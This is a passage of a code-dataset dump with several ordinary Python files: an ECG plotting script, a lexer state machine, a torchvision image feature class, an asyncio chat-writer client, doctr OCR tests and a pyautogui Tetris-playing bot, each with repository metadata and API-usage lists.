"evocraftsearch.spaces.BoxSpace", "line_number": 93, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 94, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 94, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 95, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 96, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 97, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 97, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 98, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 99, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 100, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 100, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 101, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten", "line_number": 105, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 105, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.utils.unflatten", "line_number": 106, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.allclose", "line_number": 114, "usage_type": "call"}, {"api_name": "addict.Dict", "line_number": 116, "usage_type": "argument"}]} +{"seq_id": "12110970396", "text": "import matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nimport setupaxis\nfrom PreProcess import PreProcess\n\n\ndef my_plot(layout, data):\n print(layout)\n plt.subplot(4, 1, layout)\n plt.plot(data.get_values(), color='black', linewidth=0.5)\n setupaxis.setup_axis()\n\n\nif __name__ == '__main__':\n path = 'C:\\\\Users\\\\user\\\\Downloads\\\\'\n filename = 'processed_ecg.xlsx'\n # filename = '29.xlsx'\n\n # path = r'C:\\Users\\user\\Desktop\\整机\\典型927\\朱媛媛\\\\'\n # filename = r'16:57.xlsx'\n\n fullpath_name = path + filename\n\n my_data = PreProcess(fullpath_name).process(False)\n\n plt.figure(figsize=(20, 4))\n plt.subplots_adjust(bottom=0, top=1, left=0, right=1, hspace=0)\n\n plt.plot(my_data.get_values(), color='black', linewidth=0.5)\n setupaxis.setup_axis(False)\n\n plt.show()\n plt.savefig(filename.replace('xlsx', 'png'))\n", "repo_name": "ashifa/plot", "sub_path": "partly_plot.py", "file_name": "partly_plot.py", "file_ext": "py", "file_size_in_byte": 895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplot", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "setupaxis.setup_axis", "line_number": 12, "usage_type": "call"}, {"api_name": "PreProcess.PreProcess", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "setupaxis.setup_axis", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "17020987049", "text": "from enum import Enum\n\n\nclass State(Enum):\n def __repr__(self):\n return self.name\n\n undefined = 0\n begin = 1\n char = 2\n openBrace = 3\n space = 7\n num = 8\n sign = 9\n newline = 10\n tab = 11\n str_start = 12\n str_end = 13\n operator_end = 14\n parameter = 15\n parameter_end = 16\n keyword = 100\n firstWord = 101\n secondWord = 102\n equalSign = 104\n accoladeOpenSign = 105\n accoladeCloseSign = 106\n comment = 107\n body = 108\n block_word = 109\n block_sign = 110\n block_param = 111\n block_end = 112\n label_start = 113\n label_param = 114\n label_end = 115\n\n\nclass StateMachine:\n def __init__(self, name, rules):\n \"\"\"\n State machine constructor.\n\n :param name: state machine token class\n :param rules: dict containing rules for machine\n \"\"\"\n self.rules = rules\n self.name = name\n self.prevState = State.begin\n self.state = State.begin\n\n def __repr__(self):\n return f\"{self.name.name}: {self.state.name}\"\n\n def process_object(self, obj):\n self.prevState = self.state\n if self.state != State.undefined:\n self.state = self.rules[self.prevState](obj)\n\n def reset_state(self):\n \"\"\"\n Set begin state for machine.\n \"\"\"\n self.prevState = State.begin\n self.state = State.begin\n", "repo_name": "dzmpr/peace-core", "sub_path": "src/lexer/state_machine.py", "file_name": "state_machine.py", "file_ext": "py", "file_size_in_byte": 1393, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "34455137891", "text": "from typing import Dict, Any, Union, Tuple\n\nimport torch\nfrom torchvision.prototype.utils._internal import StrEnum\n\nfrom ._feature import Feature, DEFAULT\n\n\nclass ColorSpace(StrEnum):\n # this is just for test purposes\n _SENTINEL = -1\n OTHER = 0\n GRAYSCALE = 1\n RGB = 3\n\n\nclass Image(Feature):\n color_spaces = ColorSpace\n color_space: ColorSpace\n\n @classmethod\n def _to_tensor(cls, data, *, dtype, device):\n tensor = torch.as_tensor(data, dtype=dtype, device=device)\n if tensor.ndim == 2:\n tensor = tensor.unsqueeze(0)\n elif tensor.ndim != 3:\n raise ValueError(\"Only single images with 2 or 3 dimensions are allowed.\")\n return tensor\n\n @classmethod\n def _parse_meta_data(\n cls,\n color_space: Union[str, ColorSpace] = DEFAULT, # type: ignore[assignment]\n ) -> Dict[str, Tuple[Any, Any]]:\n if isinstance(color_space, str):\n color_space = ColorSpace[color_space]\n return dict(color_space=(color_space, cls.guess_color_space))\n\n @staticmethod\n def guess_color_space(data: torch.Tensor) -> ColorSpace:\n if data.ndim < 2:\n return ColorSpace.OTHER\n elif data.ndim == 2:\n return ColorSpace.GRAYSCALE\n\n num_channels = data.shape[-3]\n if num_channels == 1:\n return ColorSpace.GRAYSCALE\n elif num_channels == 3:\n return ColorSpace.RGB\n else:\n return ColorSpace.OTHER\n", "repo_name": "isLinXu/DL_Frame_Models", "sub_path": "Pytorch_vision/torchvision/prototype/features/_image.py", "file_name": "_image.py", "file_ext": "py", "file_size_in_byte": 1484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.prototype.utils._internal.StrEnum", "line_number": 9, "usage_type": "name"}, {"api_name": "_feature.Feature", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.as_tensor", "line_number": 23, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 33, "usage_type": "name"}, {"api_name": "_feature.DEFAULT", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "72171251366", "text": "import argparse\nimport asyncio\nimport json\nimport os\n\nimport logging\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nlogger = logging.getLogger(__file__)\n\n\nasync def register(nickname):\n try:\n reader, writer = await asyncio.open_connection(os.environ['CHAT_HOST'], int(os.environ['CHAT_PORT']))\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write('\\n'.encode())\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(f'{nickname}\\n'.encode())\n await writer.drain()\n\n data = await reader.readline()\n os.environ['CHAT_TOKEN'] = json.loads(data.decode(\"utf-8\"))[\"account_hash\"]\n\n logger.debug(data.decode(\"utf-8\"))\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n finally:\n writer.close()\n await writer.wait_closed()\n\n\nasync def authorise():\n try:\n reader, writer = await asyncio.open_connection(os.environ['CHAT_HOST'], int(os.environ['CHAT_PORT']))\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(str(os.environ['CHAT_TOKEN'] + '\\n').encode())\n await writer.drain()\n\n data = await reader.readline()\n\n if not json.loads(data.decode(\"utf-8\")):\n print('введен неверный токен')\n return\n\n logger.debug(data.decode(\"utf-8\"))\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n finally:\n writer.close()\n await writer.wait_closed()\n\n\nasync def submit_message(message):\n try:\n reader, writer = await asyncio.open_connection(os.environ['CHAT_HOST'], int(os.environ['CHAT_PORT']))\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(str(os.getenv('CHAT_TOKEN') + '\\n').encode())\n\n data = await reader.readline()\n if not json.loads(data.decode(\"utf-8\")):\n print('введен неверный токен')\n return\n\n logger.debug(data.decode(\"utf-8\"))\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(f'{message}\\n\\n'.encode())\n await writer.drain()\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n finally:\n writer.close()\n await writer.wait_closed()\n\n\nasync def main():\n\n if os.environ['CHAT_USER_NAME']:\n await register(os.environ['CHAT_USER_NAME'])\n\n await authorise()\n\n await submit_message(os.getenv('CHAT_MESSAGE'))\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n parser = argparse.ArgumentParser(description='Async writer')\n parser.add_argument('--host', type=str, default='minechat.dvmn.org', help='Connection host', dest='host')\n parser.add_argument('--port', type=int, default=5050, help='IP-port', dest='port')\n parser.add_argument('--token', type=str, default=os.getenv('CHAT_TOKEN'), help='chat token',\n dest='token')\n parser.add_argument('--username', type=str, default='', help='username', dest='username')\n parser.add_argument('--message', type=str, default='Hello world!', help='your message', dest='message')\n\n args = parser.parse_args()\n\n os.environ['CHAT_HOST'] = args.host\n os.environ['CHAT_PORT'] = str(args.port)\n os.environ['CHAT_TOKEN'] = args.token\n os.environ['CHAT_USER_NAME'] = args.username\n os.environ['CHAT_MESSAGE'] = args.message\n\n asyncio.run(main())\n\n", "repo_name": "dkuba/python_async_lesson4", "sub_path": "chat_writer.py", "file_name": "chat_writer.py", "file_ext": "py", "file_size_in_byte": 3575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 17, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 53, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 67, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 72, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 75, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 103, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 108, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 119, "usage_type": "attribute"}, {"api_name": "asyncio.run", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "12963251083", "text": "from typing import List, Tuple\nfrom unittest.mock import MagicMock, patch\n\nfrom pytest import mark\n\nfrom deepdoctection.extern.base import DetectionResult\nfrom deepdoctection.extern.doctrocr import DoctrTextlineDetector, DoctrTextRecognizer\nfrom deepdoctection.extern.model import ModelCatalog, ModelDownloadManager\nfrom deepdoctection.utils.detection_types import ImageType\nfrom tests.data import Annotations\n\n\ndef get_mock_word_results(np_img: ImageType, predictor, device) -> List[DetectionResult]: # type: ignore # pylint: disable=W0613\n \"\"\"\n Returns WordResults attr: word_results_list\n \"\"\"\n return Annotations().get_word_detect_results()\n\n\ndef get_mock_text_line_results( # type: ignore\n inputs: List[Tuple[str, ImageType]], predictor, device # pylint: disable=W0613\n) -> List[DetectionResult]:\n \"\"\"\n Returns two DetectionResult\n \"\"\"\n\n return [\n DetectionResult(score=0.1, text=\"Foo\", uuid=\"cf234ec9-52cf-4710-94ce-288f0e055091\"),\n DetectionResult(score=0.4, text=\"Bak\", uuid=\"cf234ec9-52cf-4710-94ce-288f0e055092\"),\n ]\n\n\nclass TestDoctrTextlineDetector:\n \"\"\"\n Test DoctrTextlineDetector\n \"\"\"\n\n @staticmethod\n @mark.pt_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text_lines\", MagicMock(side_effect=get_mock_word_results))\n def test_pt_doctr_detector_predicts_image(np_image: ImageType) -> None:\n \"\"\"\n Detector calls doctr_predict_text_lines. Only runs in pt environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/db_resnet50/pt/db_resnet50-ac60cadc.pt\"\n )\n categories = ModelCatalog.get_profile(\"doctr/db_resnet50/pt/db_resnet50-ac60cadc.pt\").categories\n doctr = DoctrTextlineDetector(\"db_resnet50\", path_weights, categories, \"cpu\") # type: ignore\n\n # Act\n results = doctr.predict(np_image)\n\n # Assert\n assert len(results) == 2\n\n @staticmethod\n @mark.tf_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text_lines\", MagicMock(side_effect=get_mock_word_results))\n def test_tf_doctr_detector_predicts_image(np_image: ImageType) -> None:\n \"\"\"\n Detector calls doctr_predict_text_lines. Only runs in tf environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/db_resnet50/tf/db_resnet50-adcafc63.zip\"\n )\n categories = ModelCatalog.get_profile(\"doctr/db_resnet50/tf/db_resnet50-adcafc63.zip\").categories\n doctr = DoctrTextlineDetector(\"db_resnet50\", path_weights, categories, \"cpu\") # type: ignore\n\n # Act\n results = doctr.predict(np_image)\n\n # Assert\n assert len(results) == 2\n\n\nclass TestDoctrTextRecognizer:\n \"\"\"\n Test DoctrTextRecognizer\n \"\"\"\n\n @staticmethod\n @mark.pt_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text\", MagicMock(side_effect=get_mock_text_line_results))\n def test_doctr_pt_recognizer_predicts_text(text_lines: List[Tuple[str, ImageType]]) -> None:\n \"\"\"\n Detector calls doctr_predict_text. Only runs in pt environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/crnn_vgg16_bn/pt/crnn_vgg16_bn-9762b0b0.pt\"\n )\n doctr = DoctrTextRecognizer(\"crnn_vgg16_bn\", path_weights, \"cpu\")\n\n # Act\n results = doctr.predict(text_lines)\n\n # Assert\n assert len(results) == 2\n\n @staticmethod\n @mark.tf_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text\", MagicMock(side_effect=get_mock_text_line_results))\n def test_doctr_tf_recognizer_predicts_text(text_lines: List[Tuple[str, ImageType]]) -> None:\n \"\"\"\n Detector calls doctr_predict_text. Only runs in tf environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/crnn_vgg16_bn/tf/crnn_vgg16_bn-76b7f2c6.zip\"\n )\n doctr = DoctrTextRecognizer(\"crnn_vgg16_bn\", path_weights, \"cpu\")\n\n # Act\n results = doctr.predict(text_lines)\n\n # Assert\n assert len(results) == 2\n", "repo_name": "deepdoctection/deepdoctection", "sub_path": "tests/extern/test_doctrocr.py", "file_name": "test_doctrocr.py", "file_ext": "py", "file_size_in_byte": 4263, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1814, "dataset": "github-code", "pt": "52", "api": [{"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 13, "usage_type": "name"}, {"api_name": "tests.data.Annotations", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 21, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 21, "usage_type": "name"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 28, "usage_type": "call"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 22, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 41, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 47, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 47, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelCatalog.get_profile", "line_number": 50, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelCatalog", "line_number": 50, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextlineDetector", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark.pt_deps", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 40, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 40, "usage_type": "call"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 62, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 68, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 68, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelCatalog.get_profile", "line_number": 71, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelCatalog", "line_number": 71, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextlineDetector", "line_number": 72, "usage_type": "call"}, {"api_name": "pytest.mark.tf_deps", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 60, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 61, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 61, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 89, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 89, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 89, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 95, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 95, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextRecognizer", "line_number": 98, "usage_type": "call"}, {"api_name": "pytest.mark.pt_deps", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 87, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 88, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 88, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 109, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 109, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 115, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 115, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextRecognizer", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark.tf_deps", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 107, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 108, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "38966429378", "text": "import pyautogui\r\nimport sys\r\nimport time\r\n\r\nclass Board:\r\n blockWidth = 26\r\n numColumns = 10\r\n numRows = 20\r\n grid = [False] * ((numRows+1) * numColumns) # +1 row, prevent out of bounds\r\n origin = (0, 0)\r\n nextPieceNumber = 0\r\n activePieceNumber = 0\r\n\r\n def findOrigin(self):\r\n orientPic = 'orient.PNG'\r\n orientXOffset = 18\r\n orientYOffset = 45\r\n\r\n origin = pyautogui.locateOnScreen(orientPic, grayscale=True)\r\n if origin == None:\r\n print('Open https://tetris.com/play-tetris')\r\n print('Press PLAY')\r\n print('Run main.py')\r\n sys.exit()\r\n\r\n (x, y, width, height)= origin\r\n return (x + orientXOffset, y + orientYOffset)\r\n\r\n def findActivePieceNumber(self):\r\n pieceNumbersByColor = {\r\n (143, 195, 205): 0,\r\n (205, 197, 143): 1,\r\n (189, 143, 205): 2,\r\n (205, 143, 143): 3,\r\n (143, 205, 156): 4,\r\n (205, 177, 143): 5,\r\n (143, 170, 205): 6,\r\n }\r\n\r\n for y in range(self.numRows):\r\n for x in range(self.numColumns):\r\n xPixel = self.origin[0] + (x * self.blockWidth)\r\n yPixel = self.origin[1] + (y * self.blockWidth)\r\n color = pyautogui.pixel(xPixel, yPixel)\r\n if (color != (0, 0, 0)):\r\n return pieceNumbersByColor[color]\r\n print('Error in getActivePieceNumber')\r\n\r\n def findNextPieceNumber(self):\r\n xOffset = 375\r\n yOffset = 90\r\n pieceNumbersByColor = {\r\n (0, 114, 127) : 0,\r\n (149, 142, 67): 1,\r\n (134, 67, 149): 2,\r\n (149, 67, 67) : 3,\r\n (67, 149, 92) : 4,\r\n (149, 123, 67): 5,\r\n (67, 112, 149): 6,\r\n }\r\n\r\n color = pyautogui.pixel(self.origin[0] + xOffset, self.origin[1] + yOffset)\r\n if color not in pieceNumbersByColor:\r\n print('Exitting...') # Game Over\r\n sys.exit()\r\n return pieceNumbersByColor[color]\r\n\r\n def unpause(self):\r\n xOffset = 127\r\n yOffset = 190\r\n\r\n (xOrigin, yOrigin) = self.origin\r\n pyautogui.click(xOrigin+xOffset, yOrigin+yOffset)\r\n time.sleep(3)\r\n\r\n def __init__(self):\r\n pyautogui.PAUSE = 0\r\n self.origin = self.findOrigin()\r\n self.unpause()\r\n self.nextPieceNumber = self.findNextPieceNumber()\r\n self.activePieceNumber = self.findActivePieceNumber()\r\n pyautogui.PAUSE = .035\r\n\r\n def move(self, move):\r\n def clearCompletedLines():\r\n for y in range(self.numRows):\r\n if isLineFilled(y):\r\n for index in range((y * self.numColumns) - 1, 0, -1):\r\n self.grid[index + self.numColumns] = self.grid[index]\r\n\r\n def isLineFilled(y):\r\n for x in range(10):\r\n if not self.grid[y * self.numColumns + x]:\r\n return False\r\n return True\r\n\r\n (orientation, xMove) = move\r\n\r\n # send keystrokes\r\n for i in range(orientation):\r\n pyautogui.press('up')\r\n if (xMove > 0):\r\n for i in range(xMove):\r\n pyautogui.press('right')\r\n else:\r\n for i in range(-xMove):\r\n pyautogui.press('left')\r\n pyautogui.press('space')\r\n\r\n # update grid with new blocks\r\n newCoords = self.predictCoordsAfterMove(orientation, xMove)\r\n for coord in newCoords:\r\n (x, y) = coord\r\n self.grid[y * self.numColumns + x] = True\r\n clearCompletedLines()\r\n\r\n # wait for the next piece\r\n for i in range(16):\r\n if not self.findNextPieceNumber() == self.nextPieceNumber:\r\n break\r\n time.sleep(.01)\r\n\r\n self.activePieceNumber = self.nextPieceNumber\r\n self.nextPieceNumber = self.findNextPieceNumber()\r\n\r\n def predictCoordsAfterMove(self, orientation, xMove):\r\n # coordArray[pieceType][orientation][blockNumber]\r\n numOrientations = 4\r\n numPiecetypes = 7\r\n coordArray = [[None for i in range(numOrientations)] for j in range(numPiecetypes)]\r\n coordArray[0][0] = [(3, 1), (4, 1), (5, 1), (6, 1)]\r\n coordArray[0][1] = [(5, 0), (5, 1), (5, 2), (5, 3)]\r\n coordArray[0][2] = [(3, 0), (4, 0), (5, 0), (6, 0)]\r\n coordArray[0][3] = [(4, 0), (4, 1), (4, 2), (4, 3)]\r\n coordArray[1][0] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[1][1] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[1][2] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[1][3] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[2][0] = [(4, 0), (3, 1), (4, 1), (5, 1)]\r\n coordArray[2][1] = [(4, 0), (4, 1), (5, 1), (4, 2)]\r\n coordArray[2][2] = [(3, 1), (4, 1), (5, 1), (4, 2)]\r\n coordArray[2][3] = [(4, 0), (3, 1), (4, 1), (4, 2)]\r\n coordArray[3][0] = [(3, 0), (4, 0), (4, 1), (5, 1)]\r\n coordArray[3][1] = [(5, 0), (4, 1), (5, 1), (4, 2)]\r\n coordArray[3][2] = [(3, 1), (4, 1), (4, 2), (5, 2)]\r\n coordArray[3][3] = [(5, 1), (4, 2), (5, 2), (4, 3)]\r\n coordArray[4][0] = [(4, 0), (5, 0), (3, 1), (4, 1)]\r\n coordArray[4][1] = [(4, 0), (4, 1), (5, 1), (5, 2)]\r\n coordArray[4][2] = [(4, 1), (5, 1), (3, 2), (4, 2)]\r\n coordArray[4][3] = [(3, 0), (3, 1), (4, 1), (4, 2)]\r\n coordArray[5][0] = [(5, 0), (3, 1), (4, 1), (5, 1)]\r\n coordArray[5][1] = [(4, 0), (4, 1), (4, 2), (5, 2)]\r\n coordArray[5][2] = [(3, 1), (4, 1), (5, 1), (3, 2)]\r\n coordArray[5][3] = [(3, 0), (4, 0), (4, 1), (4, 2)]\r\n coordArray[6][0] = [(3, 0), (3, 1), (4, 1), (5, 1)]\r\n coordArray[6][1] = [(4, 0), (5, 0), (4, 1), (4, 2)]\r\n coordArray[6][2] = [(3, 0), (4, 0), (5, 0), (5, 1)]\r\n coordArray[6][3] = [(4, 0), (4, 1), (4, 2), (3, 2)]\r\n\r\n # move oriented piece horizontally\r\n coords = coordArray[self.activePieceNumber][orientation]\r\n for i in range(4):\r\n (x, y) = coords[i]\r\n if x + xMove > 9 or x + xMove < 0:\r\n return None\r\n coords[i] = (x + xMove, y)\r\n\r\n # find shortest distance from piece block down to existing block or floor\r\n minDistance = self.numRows\r\n for coord in coords:\r\n (x, y) = coord\r\n blockPresent = False\r\n blockYPos = 0\r\n for blockYPos in range(self.numRows):\r\n if self.grid[(blockYPos + 1) * self.numColumns + x]:\r\n break\r\n minDistance = min([minDistance, blockYPos - y])\r\n\r\n # add shortest distance to y coords\r\n for i in range(4):\r\n (x, y) = coords[i]\r\n coords[i] = (x, y + minDistance)\r\n return coords\r\n", "repo_name": "DerekThree/Tetris", "sub_path": "Tetris/board.py", "file_name": "board.py", "file_ext": "py", "file_size_in_byte": 6857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyautogui.locateOnScreen", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "pyautogui.pixel", "line_number": 44, "usage_type": "call"}, {"api_name": "pyautogui.pixel", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 73, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "pyautogui.PAUSE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pyautogui.PAUSE", 